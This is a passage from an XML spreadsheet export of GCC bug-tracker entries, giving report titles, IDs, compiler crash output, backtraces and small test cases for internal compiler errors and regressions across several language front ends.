How-To-Repeat:
Compile the follow code fragment:
#include 
#include 
int main() {
   std::ifstream inf(input)
   std::string s
   inf &gt;&gt; s
   std::cerr &lt;&lt; read: ' &lt;&lt; s &lt;&lt; ' &lt;&lt; std::endl
   inf.close()
}
and create inputfile with multiple lines.</t>
  </si>
  <si>
    <t>trent</t>
  </si>
  <si>
    <t>GCC-12547</t>
  </si>
  <si>
    <t>[tree-ssa] simple java code with -fcheck-references causes gimplification failed</t>
  </si>
  <si>
    <t>My nightly builds have been failing for a while so I just manually
updated the tree and ran a build with the following ICE as a result.
[linus@hal9000 ~]$ uname -a
FreeBSD hal9000.alcom.aland.fi 4.9-RC FreeBSD 4.9-RC #9: Sat Oct  4 13:48:12 
EEST 2003
root@hal9000.alcom.aland.fi:/usr/obj/usr/src/sys/HAL  i386
[linus@hal9000 ~]$ gcc -v
Using builtin specs.
gcc version 2.95.4 20020320 [FreeBSD]
[linus@hal9000 ~]$ 
/stuff/gcc.obj/gcc/gcj -B/stuff/gcc.obj/i386-unknown-freebsd4.9/libjava/ 
-B/stuff/gcc.obj/gcc/ --encoding=UTF-8 -Wno-deprecated -fclasspath= 
-fbootclasspath=/stuff/gcc.obj/i386-unknown-freebsd4.9/libjava -ffloat-store -g 
-O2 -MD -MT java/lang/Runnable.lo -MF java/lang/Runnable.d -c ../../..
/gcc/libjava/java/lang/Runnable.java -o java/lang/Runnable.o &gt;/dev/null 2&gt;&amp;1
/bin/sh ./libtool --tag=GCJ --mode=compile /stuff/gcc.obj/gcc/gcj -B/stuff/gcc.
obj/i386-unknown-freebsd4.9/libjava/ -B/stuff/gcc.obj/gcc/ --encoding=UTF-8 
-Wno-deprecated -fclasspath= -fbootclasspath=/stuff/gcc.
obj/i386-unknown-freebsd4.9/libjava -ffloat-store -g -O2 -MD -MT 
java/lang/Runtime.lo -MF java/lang/Runtime.d -c -o java/lang/Runtime.lo ../../..
/gcc/libjava/java/lang/Runtime.java
/stuff/gcc.obj/gcc/gcj -B/stuff/gcc.obj/i386-unknown-freebsd4.9/libjava/ 
-B/stuff/gcc.obj/gcc/ --encoding=UTF-8 -Wno-deprecated -fclasspath= 
-fbootclasspath=/stuff/gcc.obj/i386-unknown-freebsd4.9/libjava -ffloat-store -g 
-O2 -MD -MT java/lang/Runtime.lo -MF java/lang/Runtime.d -c ../../..
/gcc/libjava/java/lang/Runtime.java -fPIC -o java/lang/.libs/Runtime.o
gimplification failed:
if (cmd.293 == 0B)
  {
    _Jv_ThrowNullPointerException ()
  }
else
  {
    iftmp.292 = cmd.293
  } &lt;cond_expr 0x2864a280
    type &lt;void_type 0x28543c3c void asm_written VOID
        align 1 symtab 0 alias set 29
        pointer_to_this  chain &lt;type_decl 0x28543cb0 
void&gt;&gt;
    side-effects
    arg 0 &lt;eq_expr 0x28649520
        type &lt;boolean_type 0x28543f68 boolean unsigned asm_written QI
            size 
            unit size 
            align 8 symtab 677810256 alias set 28 precision 1 min &lt;integer_cst 
0x28541768 0&gt; max 
            chain &gt;
        arg 0 
            unsigned used ignored SI file ../../..
/gcc/libjava/java/lang/Runtime.java line 680
            size 
            unit size 
            align 32 context  chain &lt;var_decl 
0x28905244 iftmp.292&gt;&gt;
        arg 1 &gt;
    arg 1 
        side-effects
        arg 0 
            side-effects arg 0 &lt;function_decl 0x2854fc3c 
_Jv_ThrowNullPointerException&gt;&gt;
        ../../../gcc/libjava/java/lang/Runtime.java:680&gt;
    arg 2 
        side-effects
        arg 0 
            unsigned used ignored SI file ../../..
/gcc/libjava/java/lang/Runtime.java line 680 size  
unit size &lt;integer_cst 0x2854155
8 4&gt;
            align 32 context  chain &lt;var_decl 
0x289051d0 T.291&gt;&gt; arg 1 
        ../../../gcc/libjava/java/lang/Runtime.java:680&gt;
    ../../../gcc/libjava/java/lang/Runtime.java:680&gt;
../../../gcc/libjava/java/lang/Runtime.java: In class `java.lang.Runtime':
../../../gcc/libjava/java/lang/Runtime.java: In method `java.lang.Runtime.exec(j
ava.lang.Stringjava.lang.String[]java.io.File)':
../../../gcc/libjava/java/lang/Runtime.java:680: internal compiler error: in 
gimplify_expr at gimplify.c:756
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
gmake[2]: *** [java/lang/Runtime.lo] Fel 1
gmake[2]: Leaving directory `/stuff/gcc.obj/i386-unknown-freebsd4.9/libjava'
gmake[1]: *** [all-recursive] Fel 1
gmake[1]: Leaving directory `/stuff/gcc.obj/i386-unknown-freebsd4.9/libjava'
gmake: *** [all-target-libjava] Fel 2</t>
  </si>
  <si>
    <t>lsjoberg</t>
  </si>
  <si>
    <t>GCC-79990</t>
  </si>
  <si>
    <t>[CHKP] ICE in expand_expr_addr_expr_1 at expr.c:7790</t>
  </si>
  <si>
    <t>Starting from GCC 5 (when MPX was introduced) we ICE on:
$ gcc /home/marxin/Programming/gcc/gcc/testsuite/c-c++-common/vector-subscript-5.c -fcheck-pointer-bounds -mmpx
/home/marxin/Programming/gcc/gcc/testsuite/c-c++-common/vector-subscript-5.c: In function â€˜foo.chkpâ€™:
/home/marxin/Programming/gcc/gcc/testsuite/c-c++-common/vector-subscript-5.c:6:1: internal compiler error: in expand_expr_addr_expr_1 at expr.c:7790
 foo (int i)
 ^~~
0x78598d expand_expr_addr_expr_1
	.././../gcc/expr.c:7790
0x77bf8e expand_expr_addr_expr
	.././../gcc/expr.c:7903
0x77bf8e expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def** bool)
	.././../gcc/expr.c:11047
0xc9ea65 expand_normal
	.././../gcc/expr.h:282
0xc9ea65 ix86_expand_builtin
	.././../gcc/config/i386/i386.c:36788
0x67eea9 expand_builtin(tree_node* rtx_def* rtx_def* machine_mode int)
	.././../gcc/builtins.c:6362
0x77d28e expand_expr_real_1(tree_node* rtx_def* machine_mode expand_modifier rtx_def** bool)
	.././../gcc/expr.c:10822
0x785faa store_expr_with_bounds(tree_node* rtx_def* int bool bool tree_node*)
	.././../gcc/expr.c:5552
0x786bbe expand_assignment(tree_node* tree_node* bool)
	.././../gcc/expr.c:5321
0x69add5 expand_call_stmt
	.././../gcc/cfgexpand.c:2656
0x69add5 expand_gimple_stmt_1
	.././../gcc/cfgexpand.c:3571
0x69add5 expand_gimple_stmt
	.././../gcc/cfgexpand.c:3737
0x69bf8f expand_gimple_basic_block
	.././../gcc/cfgexpand.c:5744
0x6a0546 execute
	.././../gcc/cfgexpand.c:6357</t>
  </si>
  <si>
    <t>GCC-52046</t>
  </si>
  <si>
    <t>[4.7 Regression] ICE: verify_gimple failed: invalid operands in ternary operation with -O -fexceptions -fnon-call-exceptions -ftree-vectorize</t>
  </si>
  <si>
    <t>Created attachment 26508
reduced testcase
Similiar to PR50780. The testcase was reduced from vect/vect-cond-10.c but vect/vect-cond-9.c crashes as well.
Compiler output:
$ gcc -O -fexceptions -fnon-call-exceptions -ftree-vectorize testcase.c
testcase.c: In function 'foo':
testcase.c:5:1: error: invalid operands in ternary operation
vect_var_.30_98 = VEC_COND_EXPR 
testcase.c:5:1: error: invalid operands in ternary operation
vect_var_.43_111 = VEC_COND_EXPR 
testcase.c:5:1: internal compiler error: verify_gimple failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
(gdb) bt
#0  0x00007ffff61e4790 in exit () from /lib64/libc.so.6
#1  0x00000000011c03f2 in diagnostic_action_after_output (context=0x192d800 diagnostic=Unhandled dwarf expression opcode 0xfa
) at /mnt/svn/gcc-trunk/gcc/diagnostic.c:243
#2  0x00000000011c055e in diagnostic_report_diagnostic (context=0x192d800 diagnostic=0x7fffffffd360) at /mnt/svn/gcc-trunk/gcc/diagnostic.c:552
#3  0x00000000011c1210 in internal_error (gmsgid=) at /mnt/svn/gcc-trunk/gcc/diagnostic.c:845
#4  0x0000000000a0d797 in verify_gimple_in_cfg (fn=0x7ffff5a99460) at /mnt/svn/gcc-trunk/gcc/tree-cfg.c:4578
#5  0x0000000000b575d6 in verify_ssa (check_modified_stmt=true) at /mnt/svn/gcc-trunk/gcc/tree-ssa.c:928
#6  0x00000000008f7d0c in execute_function_todo (data=) at /mnt/svn/gcc-trunk/gcc/passes.c:1727
#7  0x00000000008f865e in execute_todo (flags=2082) at /mnt/svn/gcc-trunk/gcc/passes.c:1758
#8  0x00000000008fb91e in execute_one_pass (pass=0x17cb8c0) at /mnt/svn/gcc-trunk/gcc/passes.c:2104
#9  0x00000000008fbca5 in execute_pass_list (pass=0x17cb8c0) at /mnt/svn/gcc-trunk/gcc/passes.c:2136
#10 0x00000000008fbcb7 in execute_pass_list (pass=0x17cbaa0) at /mnt/svn/gcc-trunk/gcc/passes.c:2137
#11 0x00000000008fbcb7 in execute_pass_list (pass=0x17cad20) at /mnt/svn/gcc-trunk/gcc/passes.c:2137
#12 0x0000000000a5dffe in tree_rest_of_compilation (fndecl=0x7ffff5ba6f00) at /mnt/svn/gcc-trunk/gcc/tree-optimize.c:420
#13 0x00000000006afe3a in cgraph_expand_function (node=0x7ffff5a976c0) at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1819
#14 0x00000000006b1d0c in cgraph_expand_all_functions () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1886
#15 cgraph_optimize () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:2200
#16 0x00000000006b236a in cgraph_finalize_compilation_unit () at /mnt/svn/gcc-trunk/gcc/cgraphunit.c:1328
#17 0x000000000058ec20 in c_write_global_declarations () at /mnt/svn/gcc-trunk/gcc/c-decl.c:10030
#18 0x00000000009f081c in compile_file () at /mnt/svn/gcc-trunk/gcc/toplev.c:573
#19 do_compile () at /mnt/svn/gcc-trunk/gcc/toplev.c:1938
#20 toplev_main (argc=16 argv=0x7fffffffd848) at /mnt/svn/gcc-trunk/gcc/toplev.c:2014
#21 0x00007ffff61cc09d in __libc_start_main () from /lib64/libc.so.6
#22 0x0000000000572321 in _start ()
Tested revisions:
r183676 - crash
4.6 r180325 - OK</t>
  </si>
  <si>
    <t>GCC-59310</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/gomp/openmp-simd-1.c (test for excess errors)</t>
  </si>
  <si>
    <t>When GCC is bootstrapped with -fsanitize=address I got
AddressSanitizer: stack-buffer-overflow on address 0x7fffa0ffedca at pc 0x6d57db
...
[hjl@gnu-mic-2 gcc]$ addr2line -e cc1 0x6d57db
/export/gnu/import/git/gcc/gcc/c/c-parser.c:11787
[hjl@gnu-mic-2 gcc]$</t>
  </si>
  <si>
    <t>GCC-2485</t>
  </si>
  <si>
    <t xml:space="preserve"> Bernd Schmidt wrote:
 &gt; On 27 Mar 2001 bkohlen@intrinsyc.com wrote:
 &gt;
 &gt; &gt; gcc cross compiler for arm with fairly standard configure
 &gt; &gt; flags. used in combination with glibc-2.1.3 and binutils-2.10.
 &gt; &gt; I was compiling xfree86 for arm when error occured.
 &gt; &gt; &gt;Description:
 &gt; &gt; When installing xfree86 (on my pc so that I can package it
 &gt; &gt; for arm) it compiles shadow.c and I get the following error:
 &gt; &gt;
 &gt; &gt; shadow.c: In function `shadowImageGlyphBlt':
 &gt; &gt; shadow.c:1173: Internal compiler error in `purge_addressof_1' at function.c:3183
 &gt; &gt; Please submit a full bug report.
 &gt; &gt; See  for instructions.
 &gt;
 &gt; Fixed with the following patch on the 2.95 branch.  See also the original
 &gt; submission
 &gt;   http://gcc.gnu.org/ml/gcc-patches/1999-11/msg00218.html
 &gt;
 &gt; Bernd
 &gt;
 I guess I should have CC'd my first thank you to all these lists as Phil Blundell has
 already pointed me to this patch.  Thank you very much for the information and I
 apologize for the inconvenience caused by my lack of follow-up.
 Cheers
 Ben
Release:
unknown</t>
  </si>
  <si>
    <t>bkohlen</t>
  </si>
  <si>
    <t>GCC-1120</t>
  </si>
  <si>
    <t>gcj can't deal with obfuscated code where the SourceFile attr contains bad chars</t>
  </si>
  <si>
    <t>Please refer to http://sourceware.cygnus.com/ml/java-discuss/1999-q4/msg00385.html
Release:
CVS
Environment:
Linux</t>
  </si>
  <si>
    <t>GCC-3241</t>
  </si>
  <si>
    <t>c++ core dump on large structure definitions.</t>
  </si>
  <si>
    <t xml:space="preserve">	When compiling the BasisTech Unicode Library Rosette 3.0 gcc fails with
	an internal compiler error in cc1plus.
Release:
3.0
Environment:
P
System: SunOS alma.eng.cp.net 5.6 Generic_105181-23 sun4u sparc SUNWUltra-2
Architecture: sun4
host: sparc-sun-solaris2.6
build: sparc-sun-solaris2.6
target: sparc-sun-solaris2.6
configured with: ../configure --prefix=/opt/gcc3.0
How-To-Repeat:
	Options used to compile the file were:
	/opt/gcc3.0/bin/gcc -c --save-temps -fPIC -Wall -DNDEBUG -DBT_UNIX -DBT_EGCS -I../../../include -I../../../include/BasisTech -I../base -fPIC -DBT_SUBLIBRARY csCNS11643_1986_EUC_tables.cpp -o ../encodings/obj/sol-gcc-3.0/shared/csCNS11643_1986_EUC_tables.o
	The following .ii file was generated:
See attachments for csCNS11643_1986_EUC_tables.ii.gz
</t>
  </si>
  <si>
    <t>plindner</t>
  </si>
  <si>
    <t>GCC-33579</t>
  </si>
  <si>
    <t>INIT_PRIORITY is broken</t>
  </si>
  <si>
    <t>FAIL: gcc.dg/initpri1.c execution test
FAIL: g++.dg/special/conpr-2.C execution test
FAIL: g++.dg/special/conpr-4.C execution test
FAIL: g++.dg/special/initp1.C execution test
FAIL: g++.dg/special/initpri1.C execution test
On January 4 2003 I installed a patch which in included support for
init_priority on hppa*-*-hpux11* .  This used collect2 to support constructors/destructors.
Things started to go wrong with Mark's February 24 2007 patch
.  However the
number of init_priority fails has varied somewhat with time.  At the
time of Mark's change I believe on gcc.dg/initpri1.c started failing.</t>
  </si>
  <si>
    <t>GCC-67679</t>
  </si>
  <si>
    <t>[7/8/9 Regression] -Wunitialized reports on compiler-generated variables</t>
  </si>
  <si>
    <t>With gcc 5.2 I see:
&gt; gfortran -c -g -O2 -Wuninitialized -cpp bug.f90
bug.f90:15:0:
       DIMENSION(: : :)                     :: work
 ^
Warning: â€˜work.dim[2].strideâ€™ may be used uninitialized in this function [-Wmaybe-uninitialized]
bug.f90:15:0: Warning: â€˜work.dim[1].strideâ€™ may be used uninitialized in this function [-Wmaybe-uninitialized]
bug.f90:15:0: Warning: â€˜work.offsetâ€™ may be used uninitialized in this function [-Wmaybe-uninitialized]
where the problem is that compiler generated variables appear in the output. 
(.stride happens x178 .ubound x 111 and .lbound x9 in a CP2K compile).
Some strange forms (not in this testcase) include also :
â€˜MEM[(integer(kind=4)[2] *)&amp;dim1swp_stat][1]â€™ may be used uninitialized in this function
should I try to reduce a testcase for the latter ?
testcase:
&gt; cat bug.f90
MODULE memory_utilities
  INTEGER PARAMETER :: dp=8 dp_size=8
  CHARACTER(len=*) PARAMETER PRIVATE :: moduleN = 'memory_utilities'
CONTAINS
  SUBROUTINE reallocate_c3(plb1_newub1_newlb2_newub2_newlb3_newub3_new)
    COMPLEX(KIND=dp) DIMENSION(: : :) &amp;
      POINTER                                :: p
    INTEGER INTENT(IN)                      :: lb1_new ub1_new lb2_new &amp;
                                                ub2_new lb3_new ub3_new
    CHARACTER(LEN=*) PARAMETER :: routineN = 'reallocate_c3' &amp;
      routineP = moduleN//':'//routineN
    COMPLEX(KIND=dp) PARAMETER              :: zero = (0.0_dp0.0_dp)
    INTEGER PARAMETER                       :: t_size = 2*dp_size
    COMPLEX(KIND=dp) ALLOCATABLE &amp;
      DIMENSION(: : :)                     :: work
    INTEGER :: istat lb1 lb1_old lb2 lb2_old lb3 lb3_old &amp;
      ub1 ub1_old ub2 ub2_old ub3 ub3_old
    IF (ASSOCIATED(p)) THEN
       lb1_old = LBOUND(p1)
       ub1_old = UBOUND(p1)
       lb2_old = LBOUND(p2)
       ub2_old = UBOUND(p2)
       lb3_old = LBOUND(p3)
       ub3_old = UBOUND(p3)
       lb1 = MAX(lb1_newlb1_old)
       ub1 = MIN(ub1_newub1_old)
       lb2 = MAX(lb2_newlb2_old)
       ub2 = MIN(ub2_newub2_old)
       lb3 = MAX(lb3_newlb3_old)
       ub3 = MIN(ub3_newub3_old)
       ALLOCATE (work(lb1:ub1lb2:ub2lb3:ub3)STAT=istat)
       IF (istat /= 0) THEN
          CALL stop_memory(routineNmoduleN__LINE__&amp;
                           workt_size*(ub1-lb1+1)*&amp;
                                         (ub2-lb2+1)*&amp;
                                         (ub3-lb3+1))
       END IF
       work(lb1:ub1lb2:ub2lb3:ub3) = p(lb1:ub1lb2:ub2lb3:ub3)
       DEALLOCATE (p)
    END IF
    ALLOCATE (p(lb1_new:ub1_newlb2_new:ub2_newlb3_new:ub3_new)STAT=istat)
    IF (istat /= 0) THEN
       CALL stop_memory(routineNmoduleN__LINE__&amp;
                        pt_size*(ub1_new-lb1_new+1)*&amp;
                                   (ub2_new-lb2_new+1)*&amp;
                                   (ub3_new-lb3_new+1))
    END IF
    p(:::) = zero
    IF (ASSOCIATED(p).AND.ALLOCATED(work)) THEN
       p(lb1:ub1lb2:ub2lb3:ub3) = work(lb1:ub1lb2:ub2lb3:ub3)
       DEALLOCATE (work)
    END IF
  END SUBROUTINE reallocate_c3
END MODULE memory_utilities</t>
  </si>
  <si>
    <t>GCC-72800</t>
  </si>
  <si>
    <t>[5/6 Regression] ICE on invalid C++14 code with initialized lambda capture: tree check: expected class â€˜typeâ€™ have â€˜exceptionalâ€™ (error_mark) in add_capture at cp/lambda.c:505</t>
  </si>
  <si>
    <t>This is a regression from 6.1.x. 
$ g++-trunk -v
Using built-in specs.
COLLECT_GCC=g++-trunk
COLLECT_LTO_WRAPPER=/usr/local/gcc-trunk/libexec/gcc/x86_64-pc-linux-gnu/7.0.0/lto-wrapper
Target: x86_64-pc-linux-gnu
Configured with: ../gcc-source-trunk/configure --enable-languages=cc++lto --prefix=/usr/local/gcc-trunk --disable-bootstrap
Thread model: posix
gcc version 7.0.0 20160802 (experimental) [trunk revision 238983] (GCC)
$
$ g++-trunk -c -std=c++14 small.cpp
small.cpp: In function â€˜void foo()â€™:
small.cpp:4:7: error: direct-list-initialization of â€˜autoâ€™ requires exactly one element [-fpermissive]
   [n {}] {}
       ^
small.cpp:4:7: note: for deduction to â€˜std::initializer_listâ€™ use copy-list-initialization (i.e. add â€˜=â€™ before the â€˜{â€™)
small.cpp:4:7: error: deducing from brace-enclosed initializer list requires #include 
small.cpp:4:7: internal compiler error: tree check: expected class â€˜typeâ€™ have â€˜exceptionalâ€™ (error_mark) in add_capture at cp/lambda.c:505
0x1071a07 tree_class_check_failed(tree_node const* tree_code_class char const* int char const*)
        ../../gcc-source-trunk/gcc/tree.c:9793
0x8a32d4 tree_class_check
        ../../gcc-source-trunk/gcc/tree.h:3146
0x8a32d4 add_capture(tree_node* tree_node* tree_node* bool bool)
        ../../gcc-source-trunk/gcc/cp/lambda.c:505
0x7946cb cp_parser_lambda_introducer
        ../../gcc-source-trunk/gcc/cp/parser.c:10025
0x7946cb cp_parser_lambda_expression
        ../../gcc-source-trunk/gcc/cp/parser.c:9733
0x795f6c cp_parser_primary_expression
        ../../gcc-source-trunk/gcc/cp/parser.c:4960
0x797fe6 cp_parser_postfix_expression
        ../../gcc-source-trunk/gcc/cp/parser.c:6717
0x7a101c cp_parser_unary_expression
        ../../gcc-source-trunk/gcc/cp/parser.c:8012
0x7a1877 cp_parser_cast_expression
        ../../gcc-source-trunk/gcc/cp/parser.c:8689
0x7a1e75 cp_parser_binary_expression
        ../../gcc-source-trunk/gcc/cp/parser.c:8791
0x7a2760 cp_parser_assignment_expression
        ../../gcc-source-trunk/gcc/cp/parser.c:9079
0x7a5059 cp_parser_expression
        ../../gcc-source-trunk/gcc/cp/parser.c:9246
0x7a57cf cp_parser_expression_statement
        ../../gcc-source-trunk/gcc/cp/parser.c:10709
0x7935fb cp_parser_statement
        ../../gcc-source-trunk/gcc/cp/parser.c:10560
0x7942bc cp_parser_statement_seq_opt
        ../../gcc-source-trunk/gcc/cp/parser.c:10832
0x7943af cp_parser_compound_statement
        ../../gcc-source-trunk/gcc/cp/parser.c:10786
0x7b2c4f cp_parser_function_body
        ../../gcc-source-trunk/gcc/cp/parser.c:20743
0x7b2c4f cp_parser_ctor_initializer_opt_and_function_body
        ../../gcc-source-trunk/gcc/cp/parser.c:20779
0x7b36f1 cp_parser_function_definition_after_declarator
        ../../gcc-source-trunk/gcc/cp/parser.c:25475
0x7b4405 cp_parser_function_definition_from_specifiers_and_declarator
        ../../gcc-source-trunk/gcc/cp/parser.c:25387
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
$
----------------------------------
void foo ()
{ 
  // should be e.g.: [n {0}] {}
  [n {}] {}
}</t>
  </si>
  <si>
    <t>GCC-51079</t>
  </si>
  <si>
    <t>[C++0x] [DR 495] Conversion function template ignored in the presence of non-template conversion function</t>
  </si>
  <si>
    <t>gcc 4.7.0 20111105 (experimental) accepts the following code if compiled with
-Wall -std=c++0x:
//---
struct C1
{
  template 
  operator T() = delete
  operator bool() { return false }
} c1
struct C2
{
private:
  template 
  operator T()
public:
  operator bool() { return false }
} c2
int ic1 = c1 // #1a
int ic2 = c2 // #1b
int ac1 = c1 + c1 // #2a
int ac2 = c2 + c2 // #2b
//---
After acceptance of the defect report
http://www.open-std.org/jtc1/sc22/wg21/docs/cwg_defects.html#495
the lines #1a/b should be rejected because the conversion function template should deduce operator int as a better match making these accesses ill-formed.
Similarly #2a/b should be rejected because there should be a manifold of possible candidates for operator+.
Bug 49531 looks related but I believe there are enough differences in the test case to justify a separate report.</t>
  </si>
  <si>
    <t>GCC-18406</t>
  </si>
  <si>
    <t>[3.4 Regression] ICE compiling Objective C code with long double arguments</t>
  </si>
  <si>
    <t>gcc  test.m -lobjc
test.m:12: internal compiler error: in encode_type at objc/objc-act.c:7249
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-63831</t>
  </si>
  <si>
    <t>[5 Regression] r217292 causes segfaults with -MM</t>
  </si>
  <si>
    <t>Starting with r217292 I get:
trippels@gcc1-power7 test % cat test.cpp
#include 
trippels@gcc1-power7 test % cat 1.h
#ifndef __has_attribute
#    define __has_attribute(x) 0
#endif
#if  __has_attribute(alloc_size)
#   define U_ALLOC_SIZE_ATTR(X) __attribute__ ((alloc_size(X)))
#endif
trippels@gcc1-power7 test % g++ -I ./ -MM test.cpp
: internal compiler error: Segmentation fault
0x109b658b crash_signal
        ../../gcc/gcc/toplev.c:358
0x110b3a90 parse_has_attribute
        ../../gcc/libcpp/expr.c:2165
0x110b3a90 eval_token
        ../../gcc/libcpp/expr.c:1059
0x110b3a90 _cpp_parse_expr
        ../../gcc/libcpp/expr.c:1227
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.</t>
  </si>
  <si>
    <t>GCC-11231</t>
  </si>
  <si>
    <t>[3.3 regression] undefined array size inside struct  cause segfault with -g</t>
  </si>
  <si>
    <t>If you compile the following code sequence as follows:
/opt/gcc-pre3.4/bin/gcc -Wall -c -O2 test.c -g
test.c:2: error: `HASH_SIZE' undeclared here (not in a function)
test.c:3: internal compiler error: Segmentation fault
Please submit a full bug report
% cat test.c
typedef struct {
	int fd_hash[HASH_SIZE]
} pfmon_task_worker_t
If you drop -g it works. If the array is declared outside of the struct
you get the expected error message.</t>
  </si>
  <si>
    <t>eranian</t>
  </si>
  <si>
    <t>GCC-28213</t>
  </si>
  <si>
    <t>ICE: Hollerith constant</t>
  </si>
  <si>
    <t>$cat a.f
      program main
      write(**) 3horz
      end
$gcc -std=legacy a.f
a.f: In function 'MAIN__':
a.f:2: internal compiler error: Bad IO basetype (9)
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
I don't know if this is really that valid.</t>
  </si>
  <si>
    <t>GCC-41620</t>
  </si>
  <si>
    <t>[4.5 regression] Bootstrap failure</t>
  </si>
  <si>
    <t>On Linux/i686 revision 152526 failed to bootstrap:
[hjl@gnu-29 libjava]$ /export/gnu/import/svn/gcc-test/bld/./gcc/xgcc -shared-libgcc -B/export/gnu/import/svn/gcc-test/bld/./gcc -nostdinc++ -L/export/gnu/import/svn/gcc-test/bld/i686-pc-linux-gnu/libstdc++-v3/src -L/export/gnu/import/svn/gcc-test/bld/i686-pc-linux-gnu/libstdc++-v3/src/.libs -B/usr/local/i686-pc-linux-gnu/bin/ -B/usr/local/i686-pc-linux-gnu/lib/ -isystem /usr/local/i686-pc-linux-gnu/include -isystem /usr/local/i686-pc-linux-gnu/sys-include -DHAVE_CONFIG_H -I. -I../../../src-trunk/libjava -I./include -I./gcj -I../../../src-trunk/libjava -Iinclude -I../../../src-trunk/libjava/include -I../../../src-trunk/libjava/classpath/include -Iclasspath/include -I../../../src-trunk/libjava/classpath/native/fdlibm -I../../../src-trunk/libjava/../boehm-gc/include -I../boehm-gc/include -I../../../src-trunk/libjava/libltdl -I../../../src-trunk/libjava/libltdl -I../../../src-trunk/libjava/.././libjava/../gcc -I../../../src-trunk/libjava/../libffi/include -I../libffi/include -fno-rtti -fnon-call-exceptions -fdollars-in-identifiers -Wswitch-enum -D_FILE_OFFSET_BITS=64 -ffloat-store -fomit-frame-pointer -Usun -Wextra -Wall -D_GNU_SOURCE -DPREFIX=\/usr/local\ -DTOOLEXECLIBDIR=\/usr/local/lib\ -DJAVA_HOME=\/usr/local\ -DBOOT_CLASS_PATH=\/usr/local/share/java/libgcj-4.5.0.jar\ -DJAVA_EXT_DIRS=\/usr/local/share/java/ext\ -DGCJ_ENDORSED_DIRS=\/usr/local/share/java/gcj-endorsed\ -DGCJ_VERSIONED_LIBDIR=\/usr/local/lib/gcj-4.5.0-11\ -DPATH_SEPARATOR=\:\ -DECJ_JAR_FILE=\\ -DLIBGCJ_DEFAULT_DATABASE=\/usr/local/lib/gcj-4.5.0-11/classmap.db\ -DLIBGCJ_DEFAULT_DATABASE_PATH_TAIL=\gcj-4.5.0-11/classmap.db\ -g -O2 -D_GNU_SOURCE -MT gij.lo -MD -MP -MF .deps/gij.Tpo -c ../../../src-trunk/libjava/gij.cc  -fPIC -DPIC -o .libs/gij.o
/tmp/ccwSEiop.s: Assembler messages:
/tmp/ccwSEiop.s:1468: Error: junk at end of line first unrecognized character is `*'
/tmp/ccwSEiop.s:1469: Error: junk at end of line first unrecognized character is `*'
/tmp/ccwSEiop.s:1470: Error: expected comma after _ZGAN8__JArrayC1Ev
[hjl@gnu-29 libjava]$
There are
1468 .globl _ZGAN8__JArrayC1Ev *INTERNAL*
1469         .hidden _ZGAN8__JArrayC1Ev *INTERNAL*
1470         .set    _ZGAN8__JArrayC1Ev *INTERNAL* _ZN8__JArrayC1Ev *INTERNAL*
Revision 152518 is OK.</t>
  </si>
  <si>
    <t>GCC-43096</t>
  </si>
  <si>
    <t>[4.5 regression] miscompilation of ACATS c37105a at -O2</t>
  </si>
  <si>
    <t>The following ACATS started failing:
.. C37105A ACATS 2.5 10-02-16 15:35:22^M
---- C37105A RECORDS WITH ONLY DISCRIMINANTS.^M
   * C37105A DISCRIMINANT-ONLY RECORDS DON'T WORK.^M
**** C37105A FAILED ****************************.^M
between:
PASS: LAST_UPDATED: Fri Jan 29 14:43:55 UTC 2010 (revision 156351)
http://gcc.gnu.org/ml/gcc-testresults/2010-01/msg02773.html
FAIL: LAST_UPDATED: Sat Jan 30 14:08:06 UTC 2010 (revision 156383)
http://gcc.gnu.org/ml/gcc-testresults/2010-01/msg02859.html
It has been consistently FAILing since.
Likely patch from looking at ChangeLog:
+2010-01-29  Eric Botcazou  
+
+       * tree-ssa-alias.c (same_type_for_tbaa): Return -1 if the types have
+       the same alias set and their sizes different constantness.
+       (aliasing_component_refs_p): Revert 2009-10-24 change.
I do not see it FAILing on other platforms.</t>
  </si>
  <si>
    <t>GCC-25018</t>
  </si>
  <si>
    <t>Segfault with simple expression</t>
  </si>
  <si>
    <t>schluter@pcl247d:~/src/work&gt; cat const.f90
module const
  real(8) parameter :: g = - sqrt(2._8) * Gf
end module const
schluter@pcl247d:~/src/work&gt; ../gcc/build/gcc/f951 const.f90
const.f90:0: internal compiler error: Segmentation fault
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
schluter@pcl247d:~/src/work&gt; 
The uninitialized variable is necessary for the segfault.  In the debugger:
(gdb) run const.f90
Starting program: /home/pcl331/schluter/src/gcc/build/gcc/f951 const.f90
Program received signal SIGSEGV Segmentation fault.
0x0805efad in check_inquiry (e=0x8695ad0) at ../../gcc/fortran/expr.c:1382
1382   name = e-&gt;symtree-&gt;n.sym-&gt;name
(gdb) bt
#0  0x0805efad in check_inquiry (e=0x8695ad0) at ../../gcc/fortran/expr.c:1382
#1  0x0806082b in check_init_expr (e=0x8695ad0) at ../../gcc/fortran/expr.c:1443
#2  0x0805edc6 in check_intrinsic_op (e=0x8695b28 check_function=0x80607c0 )
    at ../../gcc/fortran/expr.c:1284
#3  0x0806081d in check_init_expr (e=0x8695b28) at ../../gcc/fortran/expr.c:1434
#4  0x0805ed32 in check_intrinsic_op (e=0x8695c78 check_function=0x80607c0 )
    at ../../gcc/fortran/expr.c:1250
#5  0x0806081d in check_init_expr (e=0x8695c78) at ../../gcc/fortran/expr.c:1434
#6  0x0805ed32 in check_intrinsic_op (e=0x8695cd0 check_function=0x80607c0 )
    at ../../gcc/fortran/expr.c:1250
#7  0x0806081d in check_init_expr (e=0x8695cd0) at ../../gcc/fortran/expr.c:1434
#8  0x08060a52 in gfc_match_init_expr (result=0xbfffed64) at ../../gcc/fortran/expr.c:1543
#9  0x08059f00 in variable_decl (elem=Variable elem is not available.
) at ../../gcc/fortran/decl.c:1209
#10 0x0805aa82 in gfc_match_data_decl () at ../../gcc/fortran/decl.c:2240
#11 0x0807ec0a in match_word (str=Variable str is not available.
